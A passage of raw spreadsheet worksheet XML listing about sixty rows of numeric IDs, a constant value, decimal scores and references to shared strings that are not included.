        <v>0.53920000791549683</v>
      </c>
      <c r="F7314" t="s">
        <v>13461</v>
      </c>
      <c r="G7314" t="s">
        <v>14471</v>
      </c>
      <c r="H7314" t="s">
        <v>14472</v>
      </c>
    </row>
    <row r="7315" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7315" s="1">
        <v>7313</v>
      </c>
      <c r="B7315">
        <v>3973</v>
      </c>
      <c r="C7315">
        <v>3973</v>
      </c>
      <c r="D7315">
        <v>4</v>
      </c>
      <c r="E7315">
        <v>0.99229997396469116</v>
      </c>
      <c r="F7315" t="s">
        <v>13461</v>
      </c>
      <c r="G7315" t="s">
        <v>14473</v>
      </c>
      <c r="H7315" t="s">
        <v>14474</v>
      </c>
    </row>
    <row r="7316" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7316" s="1">
        <v>7314</v>
      </c>
      <c r="B7316">
        <v>6246</v>
      </c>
      <c r="C7316">
        <v>6246</v>
      </c>
      <c r="D7316">
        <v>4</v>
      </c>
      <c r="E7316">
        <v>0.37090000510215759</v>
      </c>
      <c r="F7316" t="s">
        <v>13461</v>
      </c>
      <c r="G7316" t="s">
        <v>14475</v>
      </c>
      <c r="H7316" t="s">
        <v>14476</v>
      </c>
    </row>
    <row r="7317" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7317" s="1">
        <v>7315</v>
      </c>
      <c r="B7317">
        <v>3999</v>
      </c>
      <c r="C7317">
        <v>3999</v>
      </c>
      <c r="D7317">
        <v>4</v>
      </c>
      <c r="E7317">
        <v>0.82220000028610229</v>
      </c>
      <c r="F7317" t="s">
        <v>13461</v>
      </c>
      <c r="G7317" t="s">
        <v>14477</v>
      </c>
      <c r="H7317" t="s">
        <v>14478</v>
      </c>
    </row>
    <row r="7318" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7318" s="1">
        <v>7316</v>
      </c>
      <c r="B7318">
        <v>4005</v>
      </c>
      <c r="C7318">
        <v>4005</v>
      </c>
      <c r="D7318">
        <v>4</v>
      </c>
      <c r="E7318">
        <v>0.6445000171661377</v>
      </c>
      <c r="F7318" t="s">
        <v>13461</v>
      </c>
      <c r="G7318" t="s">
        <v>14479</v>
      </c>
      <c r="H7318" t="s">
        <v>14480</v>
      </c>
    </row>
    <row r="7319" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7319" s="1">
        <v>7317</v>
      </c>
      <c r="B7319">
        <v>4010</v>
      </c>
      <c r="C7319">
        <v>4010</v>
      </c>
      <c r="D7319">
        <v>4</v>
      </c>
      <c r="E7319">
        <v>0.99129998683929443</v>
      </c>
      <c r="F7319" t="s">
        <v>13461</v>
      </c>
      <c r="G7319" t="s">
        <v>14481</v>
      </c>
      <c r="H7319" t="s">
        <v>14482</v>
      </c>
    </row>
    <row r="7320" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7320" s="1">
        <v>7318</v>
      </c>
      <c r="B7320">
        <v>3959</v>
      </c>
      <c r="C7320">
        <v>3959</v>
      </c>
      <c r="D7320">
        <v>4</v>
      </c>
      <c r="E7320">
        <v>0.99279999732971191</v>
      </c>
      <c r="F7320" t="s">
        <v>13461</v>
      </c>
      <c r="G7320" t="s">
        <v>14483</v>
      </c>
      <c r="H7320" t="s">
        <v>14484</v>
      </c>
    </row>
    <row r="7321" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7321" s="1">
        <v>7319</v>
      </c>
      <c r="B7321">
        <v>6234</v>
      </c>
      <c r="C7321">
        <v>6234</v>
      </c>
      <c r="D7321">
        <v>4</v>
      </c>
      <c r="E7321">
        <v>0.580299973487854</v>
      </c>
      <c r="F7321" t="s">
        <v>13461</v>
      </c>
      <c r="G7321" t="s">
        <v>14485</v>
      </c>
      <c r="H7321" t="s">
        <v>14486</v>
      </c>
    </row>
    <row r="7322" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7322" s="1">
        <v>7320</v>
      </c>
      <c r="B7322">
        <v>6231</v>
      </c>
      <c r="C7322">
        <v>6231</v>
      </c>
      <c r="D7322">
        <v>4</v>
      </c>
      <c r="E7322">
        <v>0.64529997110366821</v>
      </c>
      <c r="F7322" t="s">
        <v>13461</v>
      </c>
      <c r="G7322" t="s">
        <v>14487</v>
      </c>
      <c r="H7322" t="s">
        <v>14488</v>
      </c>
    </row>
    <row r="7323" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7323" s="1">
        <v>7321</v>
      </c>
      <c r="B7323">
        <v>4040</v>
      </c>
      <c r="C7323">
        <v>4040</v>
      </c>
      <c r="D7323">
        <v>4</v>
      </c>
      <c r="E7323">
        <v>0.97519999742507935</v>
      </c>
      <c r="F7323" t="s">
        <v>13461</v>
      </c>
      <c r="G7323" t="s">
        <v>14489</v>
      </c>
      <c r="H7323" t="s">
        <v>14490</v>
      </c>
    </row>
    <row r="7324" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7324" s="1">
        <v>7322</v>
      </c>
      <c r="B7324">
        <v>4041</v>
      </c>
      <c r="C7324">
        <v>4041</v>
      </c>
      <c r="D7324">
        <v>4</v>
      </c>
      <c r="E7324">
        <v>0.47889998555183411</v>
      </c>
      <c r="F7324" t="s">
        <v>13461</v>
      </c>
      <c r="G7324" t="s">
        <v>14491</v>
      </c>
      <c r="H7324" t="s">
        <v>14492</v>
      </c>
    </row>
    <row r="7325" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7325" s="1">
        <v>7323</v>
      </c>
      <c r="B7325">
        <v>6228</v>
      </c>
      <c r="C7325">
        <v>6228</v>
      </c>
      <c r="D7325">
        <v>4</v>
      </c>
      <c r="E7325">
        <v>0.81000000238418579</v>
      </c>
      <c r="F7325" t="s">
        <v>13461</v>
      </c>
      <c r="G7325" t="s">
        <v>14493</v>
      </c>
      <c r="H7325" t="s">
        <v>14494</v>
      </c>
    </row>
    <row r="7326" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7326" s="1">
        <v>7324</v>
      </c>
      <c r="B7326">
        <v>4052</v>
      </c>
      <c r="C7326">
        <v>4052</v>
      </c>
      <c r="D7326">
        <v>4</v>
      </c>
      <c r="E7326">
        <v>0.96729999780654907</v>
      </c>
      <c r="F7326" t="s">
        <v>13461</v>
      </c>
      <c r="G7326" t="s">
        <v>14495</v>
      </c>
      <c r="H7326" t="s">
        <v>14496</v>
      </c>
    </row>
    <row r="7327" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7327" s="1">
        <v>7325</v>
      </c>
      <c r="B7327">
        <v>6222</v>
      </c>
      <c r="C7327">
        <v>6222</v>
      </c>
      <c r="D7327">
        <v>4</v>
      </c>
      <c r="E7327">
        <v>0.98799997568130493</v>
      </c>
      <c r="F7327" t="s">
        <v>13461</v>
      </c>
      <c r="G7327" t="s">
        <v>14497</v>
      </c>
      <c r="H7327" t="s">
        <v>14498</v>
      </c>
    </row>
    <row r="7328" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7328" s="1">
        <v>7326</v>
      </c>
      <c r="B7328">
        <v>6221</v>
      </c>
      <c r="C7328">
        <v>6221</v>
      </c>
      <c r="D7328">
        <v>4</v>
      </c>
      <c r="E7328">
        <v>0.99629998207092285</v>
      </c>
      <c r="F7328" t="s">
        <v>13461</v>
      </c>
      <c r="G7328" t="s">
        <v>14499</v>
      </c>
      <c r="H7328" t="s">
        <v>14500</v>
      </c>
    </row>
    <row r="7329" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7329" s="1">
        <v>7327</v>
      </c>
      <c r="B7329">
        <v>6220</v>
      </c>
      <c r="C7329">
        <v>6220</v>
      </c>
      <c r="D7329">
        <v>4</v>
      </c>
      <c r="E7329">
        <v>0.9968000054359436</v>
      </c>
      <c r="F7329" t="s">
        <v>13461</v>
      </c>
      <c r="G7329" t="s">
        <v>14501</v>
      </c>
      <c r="H7329" t="s">
        <v>14502</v>
      </c>
    </row>
    <row r="7330" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7330" s="1">
        <v>7328</v>
      </c>
      <c r="B7330">
        <v>6219</v>
      </c>
      <c r="C7330">
        <v>6219</v>
      </c>
      <c r="D7330">
        <v>4</v>
      </c>
      <c r="E7330">
        <v>0.53979998826980591</v>
      </c>
      <c r="F7330" t="s">
        <v>13461</v>
      </c>
      <c r="G7330" t="s">
        <v>14503</v>
      </c>
      <c r="H7330" t="s">
        <v>14504</v>
      </c>
    </row>
    <row r="7331" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7331" s="1">
        <v>7329</v>
      </c>
      <c r="B7331">
        <v>6233</v>
      </c>
      <c r="C7331">
        <v>6233</v>
      </c>
      <c r="D7331">
        <v>4</v>
      </c>
      <c r="E7331">
        <v>0.99730002880096436</v>
      </c>
      <c r="F7331" t="s">
        <v>13461</v>
      </c>
      <c r="G7331" t="s">
        <v>14505</v>
      </c>
      <c r="H7331" t="s">
        <v>14506</v>
      </c>
    </row>
    <row r="7332" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7332" s="1">
        <v>7330</v>
      </c>
      <c r="B7332">
        <v>3756</v>
      </c>
      <c r="C7332">
        <v>3756</v>
      </c>
      <c r="D7332">
        <v>4</v>
      </c>
      <c r="E7332">
        <v>0.57990002632141113</v>
      </c>
      <c r="F7332" t="s">
        <v>13461</v>
      </c>
      <c r="G7332" t="s">
        <v>14507</v>
      </c>
      <c r="H7332" t="s">
        <v>14508</v>
      </c>
    </row>
    <row r="7333" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7333" s="1">
        <v>7331</v>
      </c>
      <c r="B7333">
        <v>6263</v>
      </c>
      <c r="C7333">
        <v>6263</v>
      </c>
      <c r="D7333">
        <v>4</v>
      </c>
      <c r="E7333">
        <v>0.517799973487854</v>
      </c>
      <c r="F7333" t="s">
        <v>13461</v>
      </c>
      <c r="G7333" t="s">
        <v>14509</v>
      </c>
      <c r="H7333" t="s">
        <v>14510</v>
      </c>
    </row>
    <row r="7334" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7334" s="1">
        <v>7332</v>
      </c>
      <c r="B7334">
        <v>3942</v>
      </c>
      <c r="C7334">
        <v>3942</v>
      </c>
      <c r="D7334">
        <v>4</v>
      </c>
      <c r="E7334">
        <v>0.94620001316070557</v>
      </c>
      <c r="F7334" t="s">
        <v>13461</v>
      </c>
      <c r="G7334" t="s">
        <v>14511</v>
      </c>
      <c r="H7334" t="s">
        <v>14218</v>
      </c>
    </row>
    <row r="7335" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7335" s="1">
        <v>7333</v>
      </c>
      <c r="B7335">
        <v>6319</v>
      </c>
      <c r="C7335">
        <v>6319</v>
      </c>
      <c r="D7335">
        <v>4</v>
      </c>
      <c r="E7335">
        <v>0.78890001773834229</v>
      </c>
      <c r="F7335" t="s">
        <v>13461</v>
      </c>
      <c r="G7335" t="s">
        <v>14512</v>
      </c>
      <c r="H7335" t="s">
        <v>14513</v>
      </c>
    </row>
    <row r="7336" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7336" s="1">
        <v>7334</v>
      </c>
      <c r="B7336">
        <v>3771</v>
      </c>
      <c r="C7336">
        <v>3771</v>
      </c>
      <c r="D7336">
        <v>4</v>
      </c>
      <c r="E7336">
        <v>0.31119999289512629</v>
      </c>
      <c r="F7336" t="s">
        <v>13461</v>
      </c>
      <c r="G7336" t="s">
        <v>14514</v>
      </c>
      <c r="H7336" t="s">
        <v>14515</v>
      </c>
    </row>
    <row r="7337" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7337" s="1">
        <v>7335</v>
      </c>
      <c r="B7337">
        <v>3777</v>
      </c>
      <c r="C7337">
        <v>3777</v>
      </c>
      <c r="D7337">
        <v>4</v>
      </c>
      <c r="E7337">
        <v>0.56669998168945313</v>
      </c>
      <c r="F7337" t="s">
        <v>13461</v>
      </c>
      <c r="G7337" t="s">
        <v>14516</v>
      </c>
      <c r="H7337" t="s">
        <v>14517</v>
      </c>
    </row>
    <row r="7338" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7338" s="1">
        <v>7336</v>
      </c>
      <c r="B7338">
        <v>6314</v>
      </c>
      <c r="C7338">
        <v>6314</v>
      </c>
      <c r="D7338">
        <v>4</v>
      </c>
      <c r="E7338">
        <v>0.55140000581741333</v>
      </c>
      <c r="F7338" t="s">
        <v>13461</v>
      </c>
      <c r="G7338" t="s">
        <v>14518</v>
      </c>
      <c r="H7338" t="s">
        <v>14519</v>
      </c>
    </row>
    <row r="7339" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7339" s="1">
        <v>7337</v>
      </c>
      <c r="B7339">
        <v>3791</v>
      </c>
      <c r="C7339">
        <v>3791</v>
      </c>
      <c r="D7339">
        <v>4</v>
      </c>
      <c r="E7339">
        <v>0.65189999341964722</v>
      </c>
      <c r="F7339" t="s">
        <v>13461</v>
      </c>
      <c r="G7339" t="s">
        <v>14520</v>
      </c>
      <c r="H7339" t="s">
        <v>14521</v>
      </c>
    </row>
    <row r="7340" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7340" s="1">
        <v>7338</v>
      </c>
      <c r="B7340">
        <v>3796</v>
      </c>
      <c r="C7340">
        <v>3796</v>
      </c>
      <c r="D7340">
        <v>4</v>
      </c>
      <c r="E7340">
        <v>0.67350000143051147</v>
      </c>
      <c r="F7340" t="s">
        <v>13461</v>
      </c>
      <c r="G7340" t="s">
        <v>14522</v>
      </c>
      <c r="H7340" t="s">
        <v>14523</v>
      </c>
    </row>
    <row r="7341" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7341" s="1">
        <v>7339</v>
      </c>
      <c r="B7341">
        <v>3801</v>
      </c>
      <c r="C7341">
        <v>3801</v>
      </c>
      <c r="D7341">
        <v>4</v>
      </c>
      <c r="E7341">
        <v>0.72439998388290405</v>
      </c>
      <c r="F7341" t="s">
        <v>13461</v>
      </c>
      <c r="G7341" t="s">
        <v>14524</v>
      </c>
      <c r="H7341" t="s">
        <v>14525</v>
      </c>
    </row>
    <row r="7342" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7342" s="1">
        <v>7340</v>
      </c>
      <c r="B7342">
        <v>3807</v>
      </c>
      <c r="C7342">
        <v>3807</v>
      </c>
      <c r="D7342">
        <v>4</v>
      </c>
      <c r="E7342">
        <v>0.98409998416900635</v>
      </c>
      <c r="F7342" t="s">
        <v>13461</v>
      </c>
      <c r="G7342" t="s">
        <v>14526</v>
      </c>
      <c r="H7342" t="s">
        <v>14527</v>
      </c>
    </row>
    <row r="7343" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7343" s="1">
        <v>7341</v>
      </c>
      <c r="B7343">
        <v>3817</v>
      </c>
      <c r="C7343">
        <v>3817</v>
      </c>
      <c r="D7343">
        <v>4</v>
      </c>
      <c r="E7343">
        <v>0.98720002174377441</v>
      </c>
      <c r="F7343" t="s">
        <v>13461</v>
      </c>
      <c r="G7343" t="s">
        <v>14528</v>
      </c>
      <c r="H7343" t="s">
        <v>14529</v>
      </c>
    </row>
    <row r="7344" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7344" s="1">
        <v>7342</v>
      </c>
      <c r="B7344">
        <v>3944</v>
      </c>
      <c r="C7344">
        <v>3944</v>
      </c>
      <c r="D7344">
        <v>4</v>
      </c>
      <c r="E7344">
        <v>0.54629999399185181</v>
      </c>
      <c r="F7344" t="s">
        <v>13461</v>
      </c>
      <c r="G7344" t="s">
        <v>14530</v>
      </c>
      <c r="H7344" t="s">
        <v>14531</v>
      </c>
    </row>
    <row r="7345" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7345" s="1">
        <v>7343</v>
      </c>
      <c r="B7345">
        <v>3819</v>
      </c>
      <c r="C7345">
        <v>3819</v>
      </c>
      <c r="D7345">
        <v>4</v>
      </c>
      <c r="E7345">
        <v>0.81470000743865967</v>
      </c>
      <c r="F7345" t="s">
        <v>13461</v>
      </c>
      <c r="G7345" t="s">
        <v>14532</v>
      </c>
      <c r="H7345" t="s">
        <v>14533</v>
      </c>
    </row>
    <row r="7346" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7346" s="1">
        <v>7344</v>
      </c>
      <c r="B7346">
        <v>3837</v>
      </c>
      <c r="C7346">
        <v>3837</v>
      </c>
      <c r="D7346">
        <v>4</v>
      </c>
      <c r="E7346">
        <v>0.98729997873306274</v>
      </c>
      <c r="F7346" t="s">
        <v>13461</v>
      </c>
      <c r="G7346" t="s">
        <v>14534</v>
      </c>
      <c r="H7346" t="s">
        <v>14535</v>
      </c>
    </row>
    <row r="7347" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7347" s="1">
        <v>7345</v>
      </c>
      <c r="B7347">
        <v>3858</v>
      </c>
      <c r="C7347">
        <v>3858</v>
      </c>
      <c r="D7347">
        <v>4</v>
      </c>
      <c r="E7347">
        <v>0.99839997291564941</v>
      </c>
      <c r="F7347" t="s">
        <v>13461</v>
      </c>
      <c r="G7347" t="s">
        <v>14536</v>
      </c>
      <c r="H7347" t="s">
        <v>14537</v>
      </c>
    </row>
    <row r="7348" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7348" s="1">
        <v>7346</v>
      </c>
      <c r="B7348">
        <v>3860</v>
      </c>
      <c r="C7348">
        <v>3860</v>
      </c>
      <c r="D7348">
        <v>4</v>
      </c>
      <c r="E7348">
        <v>0.5900999903678894</v>
      </c>
      <c r="F7348" t="s">
        <v>13461</v>
      </c>
      <c r="G7348" t="s">
        <v>14538</v>
      </c>
      <c r="H7348" t="s">
        <v>14539</v>
      </c>
    </row>
    <row r="7349" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7349" s="1">
        <v>7347</v>
      </c>
      <c r="B7349">
        <v>3876</v>
      </c>
      <c r="C7349">
        <v>3876</v>
      </c>
      <c r="D7349">
        <v>4</v>
      </c>
      <c r="E7349">
        <v>0.96899998188018799</v>
      </c>
      <c r="F7349" t="s">
        <v>13461</v>
      </c>
      <c r="G7349" t="s">
        <v>14540</v>
      </c>
      <c r="H7349" t="s">
        <v>14541</v>
      </c>
    </row>
    <row r="7350" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7350" s="1">
        <v>7348</v>
      </c>
      <c r="B7350">
        <v>3877</v>
      </c>
      <c r="C7350">
        <v>3877</v>
      </c>
      <c r="D7350">
        <v>4</v>
      </c>
      <c r="E7350">
        <v>0.86690002679824829</v>
      </c>
      <c r="F7350" t="s">
        <v>13461</v>
      </c>
      <c r="G7350" t="s">
        <v>14542</v>
      </c>
      <c r="H7350" t="s">
        <v>14543</v>
      </c>
    </row>
    <row r="7351" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7351" s="1">
        <v>7349</v>
      </c>
      <c r="B7351">
        <v>3878</v>
      </c>
      <c r="C7351">
        <v>3878</v>
      </c>
      <c r="D7351">
        <v>4</v>
      </c>
      <c r="E7351">
        <v>0.67820000648498535</v>
      </c>
      <c r="F7351" t="s">
        <v>13461</v>
      </c>
      <c r="G7351" t="s">
        <v>14544</v>
      </c>
      <c r="H7351" t="s">
        <v>14545</v>
      </c>
    </row>
    <row r="7352" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7352" s="1">
        <v>7350</v>
      </c>
      <c r="B7352">
        <v>3884</v>
      </c>
      <c r="C7352">
        <v>3884</v>
      </c>
      <c r="D7352">
        <v>4</v>
      </c>
      <c r="E7352">
        <v>0.9968000054359436</v>
      </c>
      <c r="F7352" t="s">
        <v>13461</v>
      </c>
      <c r="G7352" t="s">
        <v>14546</v>
      </c>
      <c r="H7352" t="s">
        <v>14547</v>
      </c>
    </row>
    <row r="7353" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7353" s="1">
        <v>7351</v>
      </c>
      <c r="B7353">
        <v>3917</v>
      </c>
      <c r="C7353">
        <v>3917</v>
      </c>
      <c r="D7353">
        <v>4</v>
      </c>
      <c r="E7353">
        <v>0.63590002059936523</v>
      </c>
      <c r="F7353" t="s">
        <v>13461</v>
      </c>
      <c r="G7353" t="s">
        <v>14548</v>
      </c>
      <c r="H7353" t="s">
        <v>14549</v>
      </c>
    </row>
    <row r="7354" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7354" s="1">
        <v>7352</v>
      </c>
      <c r="B7354">
        <v>3918</v>
      </c>
      <c r="C7354">
        <v>3918</v>
      </c>
      <c r="D7354">
        <v>4</v>
      </c>
      <c r="E7354">
        <v>0.99550002813339233</v>
      </c>
      <c r="F7354" t="s">
        <v>13461</v>
      </c>
      <c r="G7354" t="s">
        <v>14550</v>
      </c>
      <c r="H7354" t="s">
        <v>14551</v>
      </c>
    </row>
    <row r="7355" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7355" s="1">
        <v>7353</v>
      </c>
      <c r="B7355">
        <v>3825</v>
      </c>
      <c r="C7355">
        <v>3825</v>
      </c>
      <c r="D7355">
        <v>4</v>
      </c>
      <c r="E7355">
        <v>0.49050000309944147</v>
      </c>
      <c r="F7355" t="s">
        <v>13461</v>
      </c>
      <c r="G7355" t="s">
        <v>14552</v>
      </c>
      <c r="H7355" t="s">
        <v>14553</v>
      </c>
    </row>
    <row r="7356" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7356" s="1">
        <v>7354</v>
      </c>
      <c r="B7356">
        <v>3521</v>
      </c>
      <c r="C7356">
        <v>3521</v>
      </c>
      <c r="D7356">
        <v>4</v>
      </c>
      <c r="E7356">
        <v>0.58710002899169922</v>
      </c>
      <c r="F7356" t="s">
        <v>13461</v>
      </c>
      <c r="G7356" t="s">
        <v>14554</v>
      </c>
      <c r="H7356" t="s">
        <v>14555</v>
      </c>
    </row>
    <row r="7357" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7357" s="1">
        <v>7355</v>
      </c>
      <c r="B7357">
        <v>4518</v>
      </c>
      <c r="C7357">
        <v>4518</v>
      </c>
      <c r="D7357">
        <v>4</v>
      </c>
      <c r="E7357">
        <v>0.94389998912811279</v>
      </c>
      <c r="F7357" t="s">
        <v>13461</v>
      </c>
      <c r="G7357" t="s">
        <v>14556</v>
      </c>
      <c r="H7357" t="s">
        <v>14557</v>
      </c>
    </row>
    <row r="7358" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7358" s="1">
        <v>7356</v>
      </c>
      <c r="B7358">
        <v>4521</v>
      </c>
      <c r="C7358">
        <v>4521</v>
      </c>
      <c r="D7358">
        <v>4</v>
      </c>
      <c r="E7358">
        <v>0.99699997901916504</v>
      </c>
      <c r="F7358" t="s">
        <v>13461</v>
      </c>
      <c r="G7358" t="s">
        <v>14558</v>
      </c>
      <c r="H7358" t="s">
        <v>14559</v>
      </c>
    </row>
    <row r="7359" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7359" s="1">
        <v>7357</v>
      </c>
      <c r="B7359">
        <v>5212</v>
      </c>
      <c r="C7359">
        <v>5212</v>
      </c>
      <c r="D7359">
        <v>4</v>
      </c>
      <c r="E7359">
        <v>0.94459998607635498</v>
      </c>
      <c r="F7359" t="s">
        <v>13461</v>
      </c>
      <c r="G7359" t="s">
        <v>14560</v>
      </c>
      <c r="H7359" t="s">
        <v>14561</v>
      </c>
    </row>
    <row r="7360" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7360" s="1">
        <v>7358</v>
      </c>
      <c r="B7360">
        <v>5213</v>
      </c>
      <c r="C7360">
        <v>5213</v>
      </c>
      <c r="D7360">
        <v>4</v>
      </c>
      <c r="E7360">
        <v>0.78829997777938843</v>
      </c>
      <c r="F7360" t="s">
        <v>13461</v>
      </c>
      <c r="G7360" t="s">
        <v>14562</v>
      </c>
      <c r="H7360" t="s">
        <v>14563</v>
      </c>
    </row>
    <row r="7361" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7361" s="1">
        <v>7359</v>
      </c>
      <c r="B7361">
        <v>5216</v>
      </c>
      <c r="C7361">
        <v>5216</v>
      </c>
      <c r="D7361">
        <v>4</v>
      </c>
      <c r="E7361">
        <v>0.57859998941421509</v>
      </c>
      <c r="F7361" t="s">
        <v>13461</v>
      </c>
      <c r="G7361" t="s">
        <v>14564</v>
      </c>
      <c r="H7361" t="s">
        <v>14565</v>
      </c>
    </row>
    <row r="7362" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7362" s="1">
        <v>7360</v>
      </c>
      <c r="B7362">
        <v>5241</v>
      </c>
      <c r="C7362">
        <v>5241</v>
      </c>
      <c r="D7362">
        <v>4</v>
      </c>
      <c r="E7362">
        <v>0.55559998750686646</v>
      </c>
      <c r="F7362" t="s">
        <v>13461</v>
      </c>
      <c r="G7362" t="s">
        <v>14566</v>
      </c>
      <c r="H7362" t="s">
        <v>14567</v>
      </c>
    </row>
    <row r="7363" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7363" s="1">
        <v>7361</v>
      </c>
      <c r="B7363">
        <v>5252</v>
      </c>
      <c r="C7363">
        <v>5252</v>
      </c>
      <c r="D7363">
        <v>4</v>
      </c>
      <c r="E7363">
        <v>0.66180002689361572</v>
      </c>
      <c r="F7363" t="s">
        <v>13461</v>
      </c>
      <c r="G7363" t="s">
        <v>14568</v>
      </c>
      <c r="H7363" t="s">
        <v>14569</v>
      </c>
    </row>
    <row r="7364" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7364" s="1">
        <v>7362</v>
      </c>
      <c r="B7364">
        <v>5255</v>
      </c>
      <c r="C7364">
        <v>5255</v>
      </c>
      <c r="D7364">
        <v>4</v>
      </c>
      <c r="E7364">
        <v>0.875</v>
      </c>
      <c r="F7364" t="s">
        <v>13461</v>
      </c>
      <c r="G7364" t="s">
        <v>14570</v>
      </c>
      <c r="H7364" t="s">
        <v>14571</v>
      </c>
    </row>
    <row r="7365" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7365" s="1">
        <v>7363</v>
      </c>
      <c r="B7365">
        <v>5258</v>
      </c>
      <c r="C7365">
        <v>5258</v>
      </c>
      <c r="D7365">
        <v>4</v>
      </c>
      <c r="E7365">
        <v>0.76120001077651978</v>
      </c>
      <c r="F7365" t="s">
        <v>13461</v>
      </c>
      <c r="G7365" t="s">
        <v>14572</v>
      </c>
      <c r="H7365" t="s">
        <v>14573</v>
      </c>
    </row>
    <row r="7366" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7366" s="1">
        <v>7364</v>
      </c>
      <c r="B7366">
        <v>5266</v>
      </c>
      <c r="C7366">
        <v>5266</v>
      </c>
      <c r="D7366">
        <v>4</v>
      </c>
      <c r="E7366">
        <v>0.4099000096321106</v>
      </c>
      <c r="F7366" t="s">
        <v>13461</v>
      </c>
      <c r="G7366" t="s">
        <v>14574</v>
      </c>
      <c r="H7366" t="s">
        <v>14575</v>
      </c>
    </row>
    <row r="7367" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7367" s="1">
        <v>7365</v>
      </c>
      <c r="B7367">
        <v>5303</v>
      </c>
      <c r="C7367">
        <v>5303</v>
      </c>
      <c r="D7367">
        <v>4</v>
      </c>
      <c r="E7367">
        <v>0.50770002603530884</v>
      </c>
      <c r="F7367" t="s">
        <v>13461</v>
      </c>
      <c r="G7367" t="s">
        <v>14576</v>
      </c>
      <c r="H7367" t="s">
        <v>14577</v>
      </c>
    </row>
    <row r="7368" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7368" s="1">
        <v>7366</v>
      </c>
      <c r="B7368">
        <v>5732</v>
      </c>
      <c r="C7368">
        <v>5732</v>
      </c>
      <c r="D7368">
        <v>4</v>
      </c>
      <c r="E7368">
        <v>0.54019999504089355</v>
      </c>
      <c r="F7368" t="s">
        <v>13461</v>
      </c>
      <c r="G7368" t="s">
        <v>14578</v>
      </c>
      <c r="H7368" t="s">
        <v>14579</v>
      </c>
    </row>
    <row r="7369" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7369" s="1">
        <v>7367</v>
      </c>
      <c r="B7369">
        <v>5707</v>
      </c>
      <c r="C7369">
        <v>5707</v>
      </c>
      <c r="D7369">
        <v>4</v>
      </c>
      <c r="E7369">
        <v>0.99269998073577881</v>
      </c>
      <c r="F7369" t="s">
        <v>13461</v>
      </c>
      <c r="G7369" t="s">
        <v>14580</v>
      </c>
      <c r="H7369" t="s">
        <v>14581</v>
      </c>
    </row>
    <row r="7370" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7370" s="1">
        <v>7368</v>
      </c>
      <c r="B7370">
        <v>5337</v>
      </c>
      <c r="C7370">
        <v>5337</v>
      </c>
      <c r="D7370">
        <v>4</v>
      </c>
      <c r="E7370">
        <v>0.97630000114440918</v>
      </c>
      <c r="F7370" t="s">
        <v>13461</v>
      </c>
      <c r="G7370" t="s">
        <v>14582</v>
      </c>
      <c r="H7370" t="s">
        <v>14583</v>
      </c>
    </row>
    <row r="7371" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7371" s="1">
        <v>7369</v>
      </c>
      <c r="B7371">
        <v>5348</v>
      </c>
      <c r="C7371">
        <v>5348</v>
      </c>
      <c r="D7371">
        <v>4</v>
      </c>
      <c r="E7371">
        <v>0.62970000505447388</v>
      </c>
      <c r="F7371" t="s">
        <v>13461</v>
      </c>
      <c r="G7371" t="s">
        <v>14584</v>
      </c>
      <c r="H7371" t="s">
        <v>14585</v>
      </c>
    </row>
    <row r="7372" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7372" s="1">
        <v>7370</v>
      </c>
      <c r="B7372">
        <v>5353</v>
      </c>
      <c r="C7372">
        <v>5353</v>
      </c>
      <c r="D7372">
        <v>4</v>
      </c>
      <c r="E7372">
        <v>0.85519999265670776</v>
      </c>
      <c r="F7372" t="s">
        <v>13461</v>
      </c>
      <c r="G7372" t="s">
        <v>14586</v>
      </c>
      <c r="H7372" t="s">
